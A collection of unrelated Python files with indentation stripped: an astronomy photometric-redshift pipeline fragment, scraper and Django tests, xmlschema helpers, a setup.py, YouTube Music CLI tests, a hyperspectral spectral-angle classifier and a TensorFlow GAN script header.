Z = get_cluster_z(spec_cat)
print Z
training_cat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.cat.lph%(iaper)s' % dict
#new_training_cat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.cat.training' % dict
#ntc = open(new_training_cat,'w')
#print training_cat
#for l in open(training_cat).readlines():
# import re
# res = re.split('\s+',l)
# print float(res[-3])
# if not (Z - 0.015 < float(res[-3]) < Z + 0.015):
# ntc.write(l)
#ntc.close()
#os.system('cp ' + training_cat + ' ' + new_training_cat )
''' make zphot.param file '''
if False:
eazydir = '/nfs/slac/g/ki/ki04/pkelly/eazy-1.00/'
dummy = open(eazydir + 'zphot.dummy','r').read()
training_cat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/specsave.cat.eazy%(iaper)s' % dict
ecat = open(training_cat,'r').read()
eheader = open(dict['header_eazy'],'r').read()
print training_cat, eheader
scat = open('/tmp/pat','w')
scat.write(eheader + ecat)
scat.close()
filter_res = 'test.RES' % dict
dummy = "".join([dummy,'FILTERS_RES ' + filter_res + '\n'])
dummy = "".join([dummy,'CATALOG_FILE /tmp/pat \n'])
dummy = "".join([dummy,'PRIOR_FILTER ' + str(1) + '\n'])
zphot = open('zphot.param','w')
zphot.write(dummy)
zphot.close()
command = eazydir + 'src/eazy'
print command
os.system(command)
parseeazy('./OUTPUT/photz.zout','0')
''' first retrieve LEPHARE zeropoint corrections '''
command = '%(LEPHAREDIR)s/source/zphota -c %(config)s \
-CAT_TYPE LONG \
-ADAPT_BAND %(ref)s \
-MAG_REF %(mag_ref)s \
-MABS_REF %(mag_ref)s \
-ADAPT_LIM 18,22 \
-ZMAX_GAL 1 \
-SPEC_OUT YES \
-CAT_IN %(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.cat.training\
-CAT_OUT %(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(iaper)s.spec.zs \
-FILTER_LIST %(fstring)s\
-ERR_SCALE %(quadadd)s' % dict
print command
#os.system(command)
print command
outputcat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(iaper)s.spec.zs' % dict
print outputcat
#parselph(outputcat)
print outputcat
#rejects = mkplot(outputcat,'0')
#print rejects
for i in []: #'1']: #: #'2']: #,'3','4']:
new_training_cat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.cat.training' % dict
reject_training_cat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.cat.reject' % dict
ntc = open(reject_training_cat,'w')
print training_cat
for l in open(new_training_cat).readlines():
import re
res = re.split('\s+',l)
bad = False
for p in rejects:
if int(p) == int(res[0]): bad = True
if not bad:
ntc.write(l)
ntc.close()
print reject_training_cat
command = '%(LEPHAREDIR)s/source/zphota -c %(config)s \
-CAT_TYPE LONG \
-ADAPT_BAND %(ref)s \
-MAG_REF %(mag_ref)s \
-MABS_REF %(mag_ref)s \
-ADAPT_LIM 18,22 \
-SPEC_OUT YES \
-ZMAX_GAL 1 \
-CAT_IN %(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.cat.reject\
-CAT_OUT %(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(iaper)s.spec.zs \
-FILTER_LIST %(fstring)s\
-ERR_SCALE %(quadadd)s' % dict
''' first retrieve LEPHARE zeropoint corrections '''
print command
os.system(command)
rejects += mkplot(outputcat,str(i))
#print new_training_cat
#print reject_training_cat
print file
#shifts = parse(file,filters,constantFilter,columns,dict['CLUSTER'])
catalog = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(SPECTRA)s.%(iaper)s.spec.bpz' % dict
print catalog
dict['catalog'] = catalog
dict['n'] = '1'
dict['probs'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(SPECTRA)s.%(iaper)s.spec.probs ' % dict
dict['flux'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(SPECTRA)s.%(iaper)s.spec.flux_comparison ' % dict
dict['input'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.%(magtype)s.%(AP_TYPE)s.%(SPECTRA)s.cat.bpz1' % dict
dict['columns'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.%(magtype)s.%(AP_TYPE)s.%(SPECTRA)s.cat.columns' % dict
#dict['SPECTRA'] = SPECTRA
#dict['SPECTRA'] = 'CWWSB4.list'
if True:
if magflux == 'FLUX': dict['magvar'] = 'no'
else: dict['magvar'] = 'yes'
command = 'python %(BPZPATH)s/bpz.py %(input)s \
-COLUMNS %(columns)s \
-MAG %(magvar)s \
-SPECTRA %(SPECTRA)s \
-PRIOR hdfn_SB \
-CHECK yes \
-PLOTS yes \
-ONLY_TYPE NO \
-ZMAX 4.0 \
-INTERP %(INTERP)s \
-PROBS_LITE %(probs)s \
-OUTPUT %(catalog)s' % dict
print command
os.system(command)
print catalog
print catalog
parsebpz(catalog,'0')
''' NEED TO MAKE CATALOG IN TABLE FORM!!!! '''
print 'finished'
else:
#shifts = apply_shifts(file,filters,columns)
print file
print columns
print 'zero shifts'
#dict.update({'SHIFTS':reduce(lambda x,y:x+','+y,shifts)})
if short or randsample:
nsplit = 1
elif not picks:
nsplit = 4
else: nsplit = 1
print nsplit, randsample, picks
print dict['incat_' + dict['type']].replace('.tab','')
import ipdb; ipdb.set_trace() # BREAKPOINT (`c` or `n` to continue)
import random
l = open(dict['incat_' + dict['type']].replace('.tab',''),'r').readlines()
if True:
subset = 0 #random.sample(range(len(l)-100),1)[0]
flist = []
#nsplit = 1
interval = int(len(l)/nsplit)
for n in range(nsplit):
dict.update({'n':n})
print 'n, writing'
start = 1 + subset + n*interval
end = 1 + subset + (n+1)*interval
if n == range(nsplit)[-1]:
end = len(l) + 2
#if n == range(nsplit)[-1]:
# end = 1 + len(l)
print start, end
print randsample
os.system('rm ' + dict['incat_' + dict['type']] + str(n))
if False: #randsample:
command = 'ldacfilter -i ' + dict['incat_' + dict['type']] + " -t STDTAB -c '(" + ID + " > 0);' -o " + dict['incat_' + dict['type']] + str(n)
elif not picks:
command = 'ldacfilter -i ' + dict['incat_' + dict['type']] + " -t STDTAB -c '((" + ID + " >= " + str(start) + ") AND (" + ID + " < " + str(end) + "));' -o " + dict['incat_' + dict['type']] + str(n)
else:
command = 'ldacfilter -i ' + dict['incat_' + dict['type']] + " -t STDTAB -c '((" + ID + " >= " + str(picks[0]) + ") AND (" + ID + " < " + str(picks[0]+1) + "));' -o " + dict['incat_' + dict['type']] + str(n)
#command = 'ldacfilter -i ' + dict['incat_' + dict['type']] + " -t STDTAB -c '((SeqNr >= 0) AND (SeqNr < 1000000));' -o " + dict['incat_' + dict['type']] + str(n)
print command
os.system(command)
if not glob(dict['incat_' + dict['type']] + str(n)):
raise Exception
catalog = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all_%(type)s%(magtype)s%(SPECTRA)s%(iaper)s_%(n)s.cat' % dict
command = 'ldactoasc -b -i ' + dict['incat_' + dict['type']] + str(n) + ' -t STDTAB > ' + catalog
print command
os.system(command)
dir = '/tmp/' + os.environ['USER'] + '/'
os.system('mkdir -p ' + dir)
os.chdir(dir)
print dict
print randsample
if True:
children = []
catalogs = []
probs = []
fluxes = []
for n in range(nsplit):
if nsplit > 1:
child = os.fork()
else: child = False
dict.update({'n':n})
catalog = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all_%(type)s%(magtype)s%(SPECTRA)s%(iaper)s_%(n)s.bpz' % dict
prob = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all_%(type)s%(magtype)s%(SPECTRA)s%(iaper)s_%(n)s.probs' % dict
flux = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all_%(type)s%(magtype)s%(SPECTRA)s%(iaper)s_%(n)s.flux_comparison ' % dict
if nsplit == 1:
children.append(child)
catalogs.append(catalog+'.tab')
probs.append(prob)
fluxes.append(flux)
if child:
children.append(child)
catalogs.append(catalog+'.tab')
probs.append(prob)
fluxes.append(flux)
else:
dict['catalog'] = catalog
dict['prob'] = prob
dict['columns'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.%(magtype)s.%(AP_TYPE)s.%(SPECTRA)s.cat.columns' % dict
if False:
eazydir = '/nfs/slac/g/ki/ki04/pkelly/eazy-1.00/'
dummy = open(eazydir + 'zphot.dummy','r').read()
#training_cat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/specsave.cat.eazy%(iaper)s' % dict
training_cat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all.%(magtype)s%(SPECTRA)s.cat.eazy1' % dict
ecat = open(training_cat,'r').read()
eheader = open(dict['header_eazy'],'r').read()
print training_cat, eheader
scat = open('/tmp/pat','w')
scat.write(eheader + ecat)
scat.close()
os.system('mkdir -p /tmp/pkelly/OUTPUT/')
filter_res = 'test.RES' % dict
dummy = "".join([dummy,'FILTERS_RES ' + filter_res + '\n'])
dummy = "".join([dummy,'CATALOG_FILE /tmp/pat \n'])
dummy = "".join([dummy,'PRIOR_FILTER ' + str(1) + '\n'])
zphot = open('zphot.param','w')
zphot.write(dummy)
zphot.close()
command = eazydir + 'src/eazy'
print command
os.system(command)
os.system('pwd')
parseeazy('./OUTPUT/photz.zout','0')
if dict['type'] == 'lph':
command = '%(LEPHAREDIR)s/source/zphota -c %(config)s \
-CAT_TYPE LONG \
-AUTO_ADAPT NO \
-Z_STEP 0.02,2.5,0.1 \
-ZMAX_GAL 2.5 \
-APPLY_SHIFTS %(SHIFTS)s \
-CAT_IN %(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all.cat.lph%(iaper)s.%(n)s \
-CAT_OUT %(catalog)s' % dict
print command
os.system(command)
parselph(catalog)
if magflux == 'FLUX': dict['magvar'] = 'no'
else: dict['magvar'] = 'yes'
if dict['type'] == 'bpz':
#-NEW_AB yes \
#''' FIX PRIOR AND INTERPOLATION!!! '''
command = 'python %(BPZPATH)s/bpz.py %(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all_bpz%(magtype)s%(SPECTRA)s%(iaper)s_%(n)s.cat \
-COLUMNS %(columns)s \
-MAG %(magvar)s \
-SPECTRA %(SPECTRA)s \
-PRIOR hdfn_SB \
-CHECK yes \
-PLOTS yes \
-VERBOSE no \
-ZMAX 4.0 \
-PLOTS yes \
-INTERP %(INTERP)s \
-PROBS_LITE %(prob)s \
-OUTPUT %(catalog)s' % dict
if only_type:
command= 'python %(BPZPATH)s/bpz.py %(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all_bpz%(magtype)s%(SPECTRA)s%(iaper)s_%(n)s.cat \
-COLUMNS %(columns)s \
-MAG %(magvar)s \
-SPECTRA %(SPECTRA)s \
-PRIOR hdfn_SB \
-CHECK yes \
-PLOTS yes \
-VERBOSE no \
-ZMAX 4.0 \
-PLOTS yes \
-INTERP 8 \
-PROBS_LITE %(prob)s \
-ONLY_TYPE yes \
-OUTPUT %(catalog)s' % dict
print command
#fit_zps(dict)
#raw_input('finished') #print catalog
os.system(command)
parsebpz(catalog,str(n))
import sys
if nsplit > 1: sys.exit(0)
if nsplit > 1:
for child in children:
os.waitpid(child,0)
if randsample:
base = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(iaper)s.%(SPECTRA)s.rand' % dict
output_catalog = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(iaper)s.rand.%(SPECTRA)s.%(calib_type)s.tab' % dict
elif picks is None:
base = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(iaper)s.%(SPECTRA)s.all' % dict
output_catalog = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(iaper)s.photoz.%(SPECTRA)s.%(calib_type)s.tab' % dict
else:
base = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(iaper)s.%(SPECTRA)s.picks' % dict
output_catalog = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(iaper)s.picks.%(SPECTRA)s.%(calib_type)s.tab' % dict
#columns = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.cat.columns' % dict
#os.system('cp ' + columns + ' ' + base + '.columns')
''' join the tables '''
temp = base + '.bpz.temp.tab'
command = 'ldacpaste -i ' + reduce(lambda x,y: x + ' ' + y, catalogs) + ' -o ' + temp + ' -t STDTAB'
print command
print catalogs, base
os.system(command)
final_cats.append(catalog + '.tab')
output = base + '.bpz.tab'
print temp, dict['incat_' + dict['type']]
join_cats([temp,dict['incat_' + dict['type']]],output)
print output
#priorcat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(iaper)s.photoz.%(SPECTRA)s.%(calib_type)s.tab' % dict
#join_cats([base+'.bpz.tab',dict['incat_prior']],output_catalog)
if True:
''' join the catalogs '''
command = 'cat ' + reduce(lambda x,y: x + ' ' + y, [z.replace('.tab','') for z in catalogs]) + ' > ' + base + '.bpz'
print command
os.system(command)
final_cats.append(catalog)
command = 'cat ' + reduce(lambda x,y: x + ' ' + y, probs) + ' > ' + base + '.probs'
print command
os.system(command)
final_cats.append(catalog)
command = 'cat ' + reduce(lambda x,y: x + ' ' + y, fluxes) + ' > ' + base + '.flux_comparison'
print command
os.system(command)
final_cats.append(catalog)
convert_to_mags(base,dict['incat_' + dict['type']],base+'.EVERY.cat')
print final_cats
#output_catalog = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(iaper)s.photoz.%(SPECTRA)s.%(calib_type)s.tab' % dict
#join_cats(final_cats,output_catalog)
if __name__ == '__main__':
import sys, os
maindir = sys.argv[1]
CLUSTER = sys.argv[2]
PHOTOMETRYDIR = sys.argv[3]
LEPHARE_CONFIGFILE = sys.argv[4]
naper = sys.argv[5]
makelibs = sys.argv[6]
do_it(maindir, CLUSTER, PHOTOMETRYDIR, LEPHARE_CONFIGFILE, naper, makelibs)
|
import shutil
from pathlib import Path
from typing import Generator
import pytest
from hub_scraper.models import DataFolder, Hub
from hub_scraper.scraper import HabrScraper
BASEDIR = Path(__file__).resolve().parent
@pytest.fixture()
def default_hub() -> Hub:
return Hub(
hub_name="python",
threads_number=1,
time_delay=2,
max_page=50,
min_up_votes=None,
)
@pytest.fixture()
def default_data_folder() -> DataFolder:
yield DataFolder(data_folder="test_outputs")
shutil.rmtree("test_outputs")
@pytest.fixture()
def default_scraper(default_hub, default_data_folder) -> HabrScraper:
return HabrScraper(default_hub, [], default_data_folder)
@pytest.fixture()
def data_folder_path() -> Generator[Path, None, None]:
test_folder = BASEDIR.joinpath("test_data")
test_folder.mkdir(exist_ok=True, parents=True)
article_folder = test_folder.joinpath("111")
article_folder.mkdir(exist_ok=True, parents=True)
yield test_folder
shutil.rmtree(test_folder)
|
def banner(text, ch='=', length=78):
"""Return a banner line centering the given text.
"text" is the text to show in the banner. None can be given to have
no text.
"ch" (optional, default '=') is the banner line character (can
also be a short string to repeat).
"length" (optional, default 78) is the length of banner to make.
Examples:
>>> banner("Peggy Sue")
'================================= Peggy Sue =================================='
>>> banner("Peggy Sue", ch='-', length=50)
'------------------- Peggy Sue --------------------'
>>> banner("Pretty pretty pretty pretty Peggy Sue", length=40)
'Pretty pretty pretty pretty Peggy Sue'
"""
if text is None:
return ch * length
elif len(text) + 2 + len(ch)*2 > length:
# Not enough space for even one line char (plus space) around text.
return text
else:
remain = length - (len(text) + 2)
prefix_len = remain / 2
suffix_len = remain - prefix_len
if len(ch) == 1:
prefix = ch * prefix_len
suffix = ch * suffix_len
else:
prefix = ch * (prefix_len/len(ch)) + ch[:prefix_len%len(ch)]
suffix = ch * (suffix_len/len(ch)) + ch[:suffix_len%len(ch)]
return prefix + ' ' + text + ' ' + suffix
|
from django.test import TestCase
from platforms.models import Platform, PlatformGroup
from tenancy.models import Tenant
class PlatformGroupTest(TestCase):
def _get_tenant(self):
tenant = Tenant.objects.create(name="Acme Corp.")
return tenant
def test_slug_is_generated_on_save(self):
platform = Platform(name="Amazon", tenant=self._get_tenant())
self.assertEquals("", platform.slug)
platform.save()
self.assertEquals("amazon", platform.slug)
def test_create_with_minimal_data(self):
platform = Platform(name="Amazon", tenant=self._get_tenant())
platform.save()
self.assertEquals("Amazon", platform.name)
self.assertEquals("amazon", platform.slug)
self.assertEquals("Acme Corp.", platform.tenant.name)
def test_create_with_complete_data(self):
group = PlatformGroup(name="Cloud")
group.save()
platform = Platform(
name="Amazon",
tenant=self._get_tenant(),
description="Amazon AWS for Operations",
group=group,
)
platform.save()
self.assertEquals("Amazon", platform.name)
self.assertEquals("amazon", platform.slug)
self.assertEquals("Acme Corp.", platform.tenant.name)
self.assertEquals("Amazon AWS for Operations", platform.description)
self.assertEquals(group, platform.group)
class PlatformGroupModeltest(TestCase):
def test_slug_is_generated_on_save(self):
group = PlatformGroup(name="Cloud")
self.assertEquals("", group.slug)
group.save()
self.assertEquals("cloud", group.slug)
def test_group_has_parent_group(self):
parent = PlatformGroup(name="parent")
parent.save()
child = PlatformGroup(name="child1", parent=parent)
child.save()
def test_complete_group(self):
group = PlatformGroup(name="Cloud", slug="cl", description="A Cloud platform")
self.assertEquals("Cloud", group.name)
self.assertEquals("cl", group.slug)
self.assertEquals("A Cloud platform", group.description)
|
def main():
#Short program that does some small math with
#integers and floating point data-types.
#int numbers
i_num1 = 5
i_num2 = 8
#float point numbers
f_num1 = 4.5
f_num2 = 8.25
#quicc maths
print("Float: " + str(f_num1) + " + " + str(f_num2) + " = " + str(f_num1+f_num2))
print("String: " + str(i_num1) + " / " + str(i_num2) + " = " + str(i_num1/i_num2))
print("Float + String: " + str(i_num1) + " * " + str(f_num2) + " = " + str(i_num1/f_num1))
if __name__=="__main__":
main()
|
# -*- coding: utf-8 -*-
#
# Copyright (c), 2016-2019, SISSA (International School for Advanced Studies).
# All rights reserved.
# This file is distributed under the terms of the MIT License.
# See the file 'LICENSE' in the root directory of the present
# distribution, or http://opensource.org/licenses/MIT.
#
# @author Davide Brunato <brunato@sissa.it>
#
"""
This module contains various helper functions and classes.
"""
import re
from .exceptions import XMLSchemaValueError, XMLSchemaTypeError, XMLSchemaKeyError
from .qnames import XSD_ANNOTATION
XSD_FINAL_ATTRIBUTE_VALUES = {'restriction', 'extension', 'list', 'union'}
NAMESPACE_PATTERN = re.compile(r'{([^}]*)}')
def get_namespace(name):
try:
return NAMESPACE_PATTERN.match(name).group(1)
except (AttributeError, TypeError):
return ''
def get_qname(uri, name):
"""
Returns an expanded QName from URI and local part. If any argument has boolean value
`False` or if the name is already an expanded QName, returns the *name* argument.
:param uri: namespace URI
:param name: local or qualified name
:return: string or the name argument
"""
if not uri or not name or name[0] in ('{', '.', '/', '['):
return name
else:
return '{%s}%s' % (uri, name)
def local_name(qname):
"""
Return the local part of an expanded QName. If the name is `None` or empty
returns the *name* argument.
:param qname: an expanded QName or a local name.
"""
try:
if qname[0] != '{':
return qname
return qname[qname.rindex('}') + 1:]
except IndexError:
return ''
except ValueError:
raise XMLSchemaValueError("wrong format for a universal name! %r" % qname)
except TypeError:
if qname is None:
return qname
raise XMLSchemaTypeError("required a string-like object or None! %r" % qname)
def qname_to_prefixed(qname, namespaces):
"""
Transforms a fully qualified name into a prefixed name using a namespace map. Returns the
*qname* argument if it's not a fully qualified name or if it has boolean value `False`.
:param qname: a fully qualified name or a local name.
:param namespaces: a map from prefixes to namespace URIs.
:return: string with a prefixed or local reference.
"""
if not qname:
return qname
namespace = get_namespace(qname)
for prefix, uri in sorted(filter(lambda x: x[1] == namespace, namespaces.items()), reverse=True):
if not uri:
return '%s:%s' % (prefix, qname) if prefix else qname
elif prefix:
return qname.replace('{%s}' % uri, '%s:' % prefix)
else:
return qname.replace('{%s}' % uri, '')
else:
return qname
def get_xsd_annotation(elem):
"""
Returns the annotation of an XSD component.
:param elem: ElementTree's node
:return: The first child element containing an XSD annotation, `None` if \
the XSD information item doesn't have an annotation.
"""
try:
return elem[0] if elem[0].tag == XSD_ANNOTATION else None
except (TypeError, IndexError):
return
def iter_xsd_components(elem, start=0):
"""
Returns an iterator for XSD child components, excluding the annotation.
:param elem: the parent Element.
:param start: the start child component to yield, the optional annotation is not counted. \
With the default value 0 starts from the first component.
"""
counter = 0
for child in elem:
if child.tag == XSD_ANNOTATION:
if counter > 0:
raise XMLSchemaValueError("XSD annotation not allowed after the first position.")
else:
if start > 0:
start -= 1
else:
yield child
counter += 1
def has_xsd_components(elem, start=0):
try:
next(iter_xsd_components(elem, start))
except StopIteration:
return False
else:
return True
def get_xsd_component(elem, required=True, strict=True):
"""
Returns the first XSD component child, excluding the annotation.
:param elem: the parent Element.
:param required: if `True`, that is the default, raises a *ValueError* if there \
is not any component; with `False` in those cases `None` is returned.
:param strict: raises a *ValueError* if there is more than one component.
"""
components_iterator = iter_xsd_components(elem)
try:
xsd_component = next(components_iterator)
except StopIteration:
if required:
raise XMLSchemaValueError("missing XSD component")
return None
else:
if not strict:
return xsd_component
try:
next(components_iterator)
except StopIteration:
return xsd_component
else:
raise XMLSchemaValueError("too many XSD components")
def get_xml_bool_attribute(elem, attribute, default=None):
"""
Get an XML boolean attribute.
:param elem: the Element instance.
:param attribute: the attribute name.
:param default: default value, accepted values are `True` or `False`.
:return: `True` or `False`.
"""
value = elem.get(attribute, default)
if value is None:
raise XMLSchemaKeyError(attribute)
elif value in ('true', '1') or value is True:
return True
elif value in ('false', '0') or value is False:
return False
else:
raise XMLSchemaTypeError("an XML boolean value is required for attribute %r" % attribute)
def get_xsd_derivation_attribute(elem, attribute, values=None):
"""
Get a derivation attribute (maybe 'block', 'blockDefault', 'final' or 'finalDefault')
checking the items with the values arguments. Returns a string.
:param elem: the Element instance.
:param attribute: the attribute name.
:param values: sequence of admitted values when the attribute value is not '#all'.
:return: a string.
"""
value = elem.get(attribute)
if value is None:
return ''
if values is None:
values = XSD_FINAL_ATTRIBUTE_VALUES
items = value.split()
if len(items) == 1 and items[0] == '#all':
return ' '.join(values)
elif not all([s in values for s in items]):
raise XMLSchemaValueError("wrong value %r for attribute %r." % (value, attribute))
return value
def get_xsd_form_attribute(elem, attribute):
"""
Get an XSD form attribute, checking the value. If the attribute is missing returns `None`
:param elem: the Element instance.
:param attribute: the attribute name (maybe 'form', or 'elementFormDefault' or 'attributeFormDefault').
:return: a string.
"""
value = elem.get(attribute)
if value is None:
return
elif value not in ('qualified', 'unqualified'):
raise XMLSchemaValueError(
"wrong value %r for attribute %r, it must be 'qualified' or 'unqualified'." % (value, attribute)
)
return value
class ParticleCounter(object):
"""
An helper class for counting total min/max occurrences of XSD particles.
"""
def __init__(self):
self.min_occurs = self.max_occurs = 0
def __repr__(self):
return '%s(%r, %r)' % (self.__class__.__name__, self.min_occurs, self.max_occurs)
def __add__(self, other):
self.min_occurs += other.min_occurs
if self.max_occurs is not None:
if other.max_occurs is None:
self.max_occurs = None
else:
self.max_occurs += other.max_occurs
return self
def __mul__(self, other):
self.min_occurs *= other.min_occurs
if self.max_occurs is None:
if other.max_occurs == 0:
self.max_occurs = 0
elif other.max_occurs is None:
if self.max_occurs != 0:
self.max_occurs = None
else:
self.max_occurs *= other.max_occurs
return self
def reset(self):
self.min_occurs = self.max_occurs = 0
|
#!/usr/bin/env python
from distutils.core import setup
setup(
name='FunctionalPy',
version='1.0.0',
description='Functional programming library for Python',
author='Aruneko',
author_email='aruneko99@gmail.com',
url='https://www.github.com/aruneko/functionalpy',
packages=['functionalpy']
)
|
import unittest
from click.testing import CliRunner
import ytmusic_deleter.cli as cli
class TestCli(unittest.TestCase):
def test_delete_uploads(self):
runner = CliRunner()
result = runner.invoke(cli.delete_uploads, ["--add-to-library"])
assert result.exit_code == 0
def test_remove_albums_from_library(self):
runner = CliRunner()
result = runner.invoke(cli.remove_library)
assert result.exit_code == 0
def test_unlike_all_songs(self):
runner = CliRunner()
result = runner.invoke(cli.unlike_all)
assert result.exit_code == 0
def test_delete_playlists(self):
runner = CliRunner()
result = runner.invoke(cli.delete_playlists)
assert result.exit_code == 0
|
import spectral as sp
import numpy as np
import math
import traceback
from PIL import Image
#attention: need to change res's name and
#cal the average spectrum of a img. Input a img and return an array (the same format as Spectral lib's )
def cal_aver_SP(img):
width, height, deepth = img.shape
sum_SP = 0
count = 0
for i in range(width):
for j in range(height):
pixel_SP = img[i,j]
if exclude_BG(pixel_SP):
continue
else:
sum_SP += pixel_SP
count += 1
return sum_SP / count
#exclude the background pixel, into an array(spectrum) and return T/F, True: background; False: not a background
def exclude_BG(pixel_array):
if sum(pixel_array) == 0:
return True
else:
return False
# input training data, maybe this would be a Wizzard ( choose files later)
def input_traning_data():
pass
def input_testing_data():
pass
# spectrum angle mapping, input reference, testing spectrum and deepth (spectrum bands). Return an angle between ref and test SP.
def cal_SP_angle(SP_reference, SP_testing, deepth):
DownSide1 = 0
DownSide2 = 0
UpSide = 0
for d in range(deepth):
bandValue_testing = SP_testing[d]
bandValue_reference = SP_reference[d]
UpSide += bandValue_reference* bandValue_testing
DownSide1 += bandValue_reference**2
DownSide2 += bandValue_testing**2
angle = UpSide/ (DownSide1**0.5 * DownSide2**0.5)
try:
angle = math.acos(angle)
except Exception as err:
print ('the abs(angle) > 1. \n Error info:'+ err.args, end = '\n')
exit(0)
return angle
#tranversing the whole testing img and cal each pixel, then classify it. return [res, accurarcy], the first record the classification info and the later saves accurarcy
# input two ref img, testing img and testing type (Default 1 is testing Oxido, 2 is testing Sul)
def Tranversing(img_reference1, img_reference2, img_testing, testingType = 1):
aver_reference1 = cal_aver_SP(img_reference1)
aver_reference2 = cal_aver_SP(img_reference2)
width, height, deepth = img_testing.shape
#res is a list that would save the classification result, 2 is background, 1 is right, 0 is wrong.
res = []
# the pixel number of background
count_bg = 0
count_right = 0
for i in range(width):
for j in range(height):
SP_testing = img_testing[i,j]
# if this pixel is background, res = 2
if exclude_BG(SP_testing):
res.append(2)
count_bg += 1
continue
SP_reference1 = aver_reference1
SP_reference2 = aver_reference2
angle_ref1 = cal_SP_angle(SP_reference1, SP_testing, deepth)
angle_ref2 = cal_SP_angle(SP_reference2,SP_testing, deepth)
# attention please: this is the red mark code, maybe u could add more barriers here.
# attention please: now ref1 is oxido, ref2 is sulfuro, testing img is a oxido
if testingType == 1:
if angle_ref1 < angle_ref2:
res.append(1)
count_right += 1
else:
res.append(0)
elif testingType == 2:
if angle_ref1 > angle_ref2:
res.append(1)
count_right += 1
else:
res.append(0)
accurarcy = count_right / (width * height - count_bg)
return [res,accurarcy]
def show_res(res_list,accurarcy, width, height,filePath,resName):
newImg = Image.new('L',(width,height))
for i in range(width):
for j in range(height):
if res_list[i*height+j] == 0:
newImg.putpixel((i,j),123)
elif res_list[i*height + j] == 1:
newImg.putpixel((i,j), 255)
elif res_list[i*height + j] == 2:
newImg.putpixel((i,j), 0)
print('\n your accurarcy is : %f \n' % accurarcy )
newImg.save(filePath + resName, 'bmp')
newImg.show()
# output the res. Two methods: accurarcy and image, white pixel is right one and black pixel is wrong.
if __name__ == '__main__':
#open the file
input_traning_data()
filePath = 'data/'
fileName_sul = "sulfuros_sub/EscSulf01_Backside_SWIR_Subset_Masked.hdr"
fileName_oxi = "oxidos/EscOx01B1_rough_SWIR.hdr"
fileName_testing = "oxidos/EscOx37B1_rough_SWIR.hdr"
#two training img. Using the aver their of all pixels
try:
img_sulfuro = sp.open_image(filePath+fileName_sul)
img_oxido = sp.open_image(filePath+fileName_oxi)
except Exception as err:
print('Cannot open your training file.\nError info:' + str(err.args), end = '\n')
exit(0)
#input testing data
input_testing_data()
try :
img_testing = sp.open_image(filePath + fileName_testing)
except Exception as err:
print('Cannot open your testing file.\n Error info:' + str(err.args), end = '\n')
exit(0)
# tranversing the img and cal spectral angle between testImg and refImg.
#Input: testing img and reference img.
if 'Sulf' in fileName_testing:
res, accurarcy = Tranversing(img_oxido,img_sulfuro, img_testing, 2)
else:
res, accurarcy = Tranversing(img_oxido,img_sulfuro, img_testing, 1)
width, height, deepth = img_testing.shape
resName = fileName_testing.split('/')[1].split('_')[0] + '_res.bmp'
show_res(res,accurarcy, width, height, filePath, resName)
|
# ---------------------------------------------------------
# Tensorflow MPC-GAN Implementation
# Licensed under The MIT License [see LICENSE for details]
# Written by Hulin Kuang
# ---------------------------------------------------------
import os
import tensorflow as tf
from solver import Solver
import numpy as np
import nibabel as nib
import scipy.io as sio
import gc
FLAGS = tf.flags.FLAGS
import time
tf.flags.DEFINE_integer('train_interval', 1, 'training interval between discriminator and generator, default: 1')
tf.flags.DEFINE_integer('ratio_gan2seg', 10, 'ratio of gan loss to seg loss, default: 10')
